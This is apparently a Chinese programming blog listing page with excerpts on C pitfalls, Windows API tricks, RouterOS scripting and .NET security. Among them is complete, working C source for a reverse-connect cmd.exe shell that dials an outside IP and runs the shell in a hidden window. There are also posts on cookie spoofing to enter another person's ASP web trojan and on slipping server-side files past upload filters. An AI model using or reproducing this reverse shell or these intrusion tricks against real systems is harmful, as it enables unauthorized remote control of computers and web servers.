C语言的最大特点是：功能强、使用方便灵活。C编译的程序对语法检查并不象其它高级语言那么严格，这就给编程人员留下“灵活的余地”，但还是由于这个灵活给程序的调试带来了许多不便，尤其对初学C语言的人来说，经常会出一些连自己都不知道错在哪里的错误。看着有错的程序，不知该如何改起，本人通过对C的学习，积累了一些C编程时常犯的错误，写给各位学员以供参考。
1.书写标识符时，忽略了大小写字母的区别。
main()
{
int a=5;
printf(“%d”,A);
}
编译程序把a和A认为是两个不同的变量名，而显示出错信息。C认为大写字母和小写字母是两个不同的字符。习惯上，符号常量名用大写，变量名用小写表示，以增加可读性。 Read the rest of this entry »

一个反向连接CMDSHELL的原代码


[code]#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"Ws2_32")

int main()
{
  WSADATA ws;
  SOCKET s;
  int ret;
  WSAStartup(MAKEWORD(2,2),&ws);
  s=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
  struct sockaddr_in server;
  server.sin_family = AF_INET;
  server.sin_port = htons(830);
  server.sin_addr.s_addr=inet_addr("192.168.1.1");
  connect(s,(struct sockaddr *)&server,sizeof(server) );
  STARTUPINFO si;
  ZeroMemory(&si,sizeof(si));
  si.cb = sizeof(si);
  si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
  si.wShowWindow = SW_HIDE;
  si.hStdInput = si.hStdOutput = si.hStdError = (void *)s;
  char cmdLine[] = "cmd.exe";
  PROCESS_INFORMATION ProcessInformation;    
  ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
  return 0;
}[/code]

DNS域名解释制作相当简单,原理是将域名解释为IP，函数如下：

function ResolveIP(HostName: string): string; {将域名解释成IP}
type
tAddr = array[0..100] of PInAddr;
pAddr = ^tAddr;
var
I: Integer;
WSA: TWSAData;
PHE: PHostEnt;
P: pAddr;
begin
Result := ”; Read the rest of this entry »

FROM : CSDN
WRITER:王晨
在Windows大行其道的今天，windows界面程序受到广大用户的欢迎。对这些程序的操作不外乎两种，键盘输入控制和鼠标输入控制。那么我们能否通过编制程序来控制系统的鼠标，例如隐藏计算机中的鼠标呢？这个问题的答案是肯定的。这里主要是通过一个Windows API函数来实现的。下面以一个Visual C++的实例来介绍如何实现这个功能。需要读者朋友们注意的是本代码具有一定的危险性，程序运行后你将无法用鼠标控制您的计算机，这时候需要对计算机的当前用户名进行注销或重新启动计算机。

　　一、实现方法

　　Windows提供了一个API函数mouse_event，可以模拟一次鼠标事件，比如左键单击、双击和右键单击等。在程序中使用此函数将产生一个十分有趣的效果，所模拟的鼠标事件将屏蔽真正的鼠标事件，我们的实例也就是利用该函数的这一特性来实现隐藏程序中的鼠标。Mouse_event函数原型如下： Read the rest of this entry »

相信在window按键突破专家没有出来的时候，很多人还不知道软件还可以这样编的吧，本人也是一样，当知道有window按键突破专家这个软件时，仔细去想一下它的实现原理，才突然恍然大悟，原来原理居然是这么的简单，为什么以前我就没有想到呢。
好了，不说那么多废话，直接进入主题，我先是说说按键突破的原理。实现按键突破的其实就是EnableWindow这个函数。

BOOL EnableWindow(
HWND hWnd,
BOOL bEnable
);
Read the rest of this entry »

四种变量
global – 定义全局变量, 可以要所有的脚本中调用共享
local – 定义本地变量，只能在其所要的脚本下调用，不能被其它脚本共享
loop index variables – 定义在for或foreach里的索引号变量
monitor variables – 监视变量

ROS算术操作
-   负号；相减。
!   逻辑非。
/   相除。
.   连接。两个符串的连接，添加元素到列表
^   异或(XOR)
~   取反
*   相剩 Read the rest of this entry »

思路是通过提交的COOKIE来查看木马的原代码，找出密码
看下面的代码
if trim(request.form(“password”))=”haiyangtop.126.com” then
response.cookies(“password”)=”allen” < |>密码是否正确
response.redirect “”&url&”"
else if Request.Cookies(“password”)<>“allen” then
call login() < |>密码错误
response.end < |>停止运行
注意：response.cookies(“password”)=”allen”
他没有要求SESSION认证，仅仅要求COOKIES里的PASSWORD的值是allen。这就是说我门可以通过COOKIES欺骗来达到进入木马的目的，然后找到其密码。
还是实战一次：
1 找到一个后门，呵呵，不是我的， Read the rest of this entry »

一个PHP图片采集程序

建立girlpicture2文件夹和pic.php，mkdir.php在同一个目录下
建立 pic.php 文件

  Read the rest of this entry »

.NET Framework 的新特性――代码访问安全性

　　为了更好的理解这一问题的解决方法,我们需要先介绍一下.NET Framework的安全机制。然后再结合我们的实际问题来讨论解决方案。

　　为了解决安全问题，.NET Framework提供了一种称为代码访问安全性的安全机制。代码访问安全性允许根据代码的来源和代码的标识等属性将代码设置为不同级别的信任代码,同时还详细定义了不同级别的对代码的信任，从而可以详细的对代码设置各自的权限而不是将最大权限赋给所有的代码。使用代码访问安全性，可以减小恶意代码或各种错误的代码带来的严重的系统安全性问题的可能性。您可以设置允许代码执行的一组操作，同样可以设置永远不允许代码执行的一组操作。

　　实现代码访问安全性的基础就是JIT（运行时编译）和IL（中间代码）。所以所有以公共语言运行库为目标的托管代码都会受益于代码访问安全性。非托管代码则无法完全使用代码访问安全性。
下面我们将介绍一下代码访问安全性实现的各种功能：

　　代码访问安全性是控制代码对受保护资源和操作的访问权限的一种机制。在 .NET Framework中，代码访问安全性执行下列功能：

　　· 定义权限和权限集，它们表示访问各种系统资源的权限。

Read the rest of this entry »

当网站不允许上传asp cer cdx htr文件时

关于web上传的问题，利用stm来上传，还能执行程序，这是一段代码：

当前文件名称:

Web服务器的名称和版本:

主机名:

端口:

客户或客户代理IP地址:

客户或客户代理主机名:

PATH_INFO 的值，但带有扩展为某个目录规范的虚拟路径:

客户端给出附加路径信息:

说保存为stm或者shtml看看，运行如下: Read the rest of this entry »